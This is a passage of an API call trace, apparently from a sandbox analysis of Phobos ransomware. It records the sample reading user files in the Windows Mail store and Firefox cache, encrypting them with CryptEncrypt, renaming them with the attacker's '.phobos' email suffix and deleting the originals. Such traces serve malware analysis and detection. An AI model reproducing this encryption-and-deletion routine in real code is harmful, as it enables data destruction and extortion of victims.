lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0192.183] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0192.183] WriteFile (in: hFile=0xb8, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0192.525] CloseHandle (hObject=0xb8) returned 1 [0192.528] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0192.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0192.529] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2113536) returned 1 [0192.529] CloseHandle (hObject=0xb8) returned 1 [0192.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore")) returned 0x2020 [0192.529] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0192.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0192.530] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0192.530] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0192.530] ReadFile (in: hFile=0xb8, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0192.558] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0xac000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0192.558] ReadFile (in: hFile=0xb8, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0192.605] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x1c4000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0192.605] ReadFile (in: hFile=0xb8, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0192.831] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa327e8) returned 1 [0192.831] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0192.831] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0070, dwBufLen=0xc0070 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0070) returned 1 [0192.837] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.838] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0192.838] WriteFile (in: hFile=0xb8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0122, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0122, lpOverlapped=0x0) returned 1 [0192.849] SetEndOfFile (hFile=0xb8) returned 1 [0192.849] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x1c4000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0192.849] WriteFile (in: hFile=0xb8, lpBuffer=0x313015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313015a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0192.850] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0xac000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0192.850] WriteFile (in: hFile=0xb8, lpBuffer=0x313015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313015a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0192.852] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0192.852] WriteFile (in: hFile=0xb8, lpBuffer=0x313015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313015a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0192.853] CloseHandle (hObject=0xb8) returned 1 [0192.854] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0192.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\fcbf5d01"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.911] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=132349) returned 1 [0192.911] CloseHandle (hObject=0x134) returned 1 [0192.911] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\fcbf5d01")) returned 0x2020 [0192.911] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\fcbf5d01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\fcbf5d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.911] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0192.911] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0192.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\fcbf5d01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0192.912] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0192.912] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0192.912] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x204fd, lpOverlapped=0x0) returned 1 [0193.707] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20500, dwBufLen=0x20500 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20500) returned 1 [0193.708] WriteFile (in: hFile=0xb8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x20500, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x20500, lpOverlapped=0x0) returned 1 [0193.711] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0193.711] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0193.711] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0193.711] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0193.711] WriteFile (in: hFile=0xb8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0193.711] CryptDestroyKey (hKey=0xa32a28) returned 1 [0193.711] CloseHandle (hObject=0x134) returned 1 [0193.711] CloseHandle (hObject=0xb8) returned 1 [0193.711] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\fcbf5d01")) returned 1 [0193.713] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0193.713] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\f17b2d01"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0193.714] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=16463) returned 1 [0193.714] CloseHandle (hObject=0xb8) returned 1 [0193.714] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\f17b2d01")) returned 0x2020 [0193.714] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\f17b2d01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.714] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\f17b2d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0193.714] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0193.714] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0193.714] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\f17b2d01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0193.715] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0193.715] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0193.715] ReadFile (in: hFile=0xb8, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x404f, lpOverlapped=0x0) returned 1 [0193.889] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4050, dwBufLen=0x4050 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4050) returned 1 [0193.889] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4050, lpOverlapped=0x0) returned 1 [0193.893] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32de8) returned 1 [0193.893] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0193.893] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0193.893] CryptDestroyKey (hKey=0xa32de8) returned 1 [0193.893] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0193.893] CryptDestroyKey (hKey=0xa32a28) returned 1 [0193.893] CloseHandle (hObject=0xb8) returned 1 [0193.893] CloseHandle (hObject=0x134) returned 1 [0193.893] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\f17b2d01")) returned 1 [0193.894] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0193.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\885eed01"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0193.899] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=68898) returned 1 [0193.899] CloseHandle (hObject=0x134) returned 1 [0193.899] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\885eed01")) returned 0x2020 [0193.899] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\885eed01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.899] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\885eed01"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0193.899] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0193.900] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0193.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\885eed01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0193.918] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0193.918] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0193.918] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x10d22, lpOverlapped=0x0) returned 1 [0193.940] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10d30, dwBufLen=0x10d30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10d30) returned 1 [0193.940] WriteFile (in: hFile=0x154, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x10d30, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x10d30, lpOverlapped=0x0) returned 1 [0193.942] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0193.942] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0193.942] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0193.942] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0193.942] WriteFile (in: hFile=0x154, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0193.943] CryptDestroyKey (hKey=0xa327e8) returned 1 [0193.943] CloseHandle (hObject=0x134) returned 1 [0193.943] CloseHandle (hObject=0x154) returned 1 [0193.943] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\885eed01")) returned 1 [0193.951] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0193.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\7e0fed01"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0193.952] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=63624) returned 1 [0193.952] CloseHandle (hObject=0x154) returned 1 [0193.952] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\7e0fed01")) returned 0x2020 [0193.952] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\7e0fed01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\7e0fed01"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0193.952] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0193.952] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0193.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\7e0fed01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 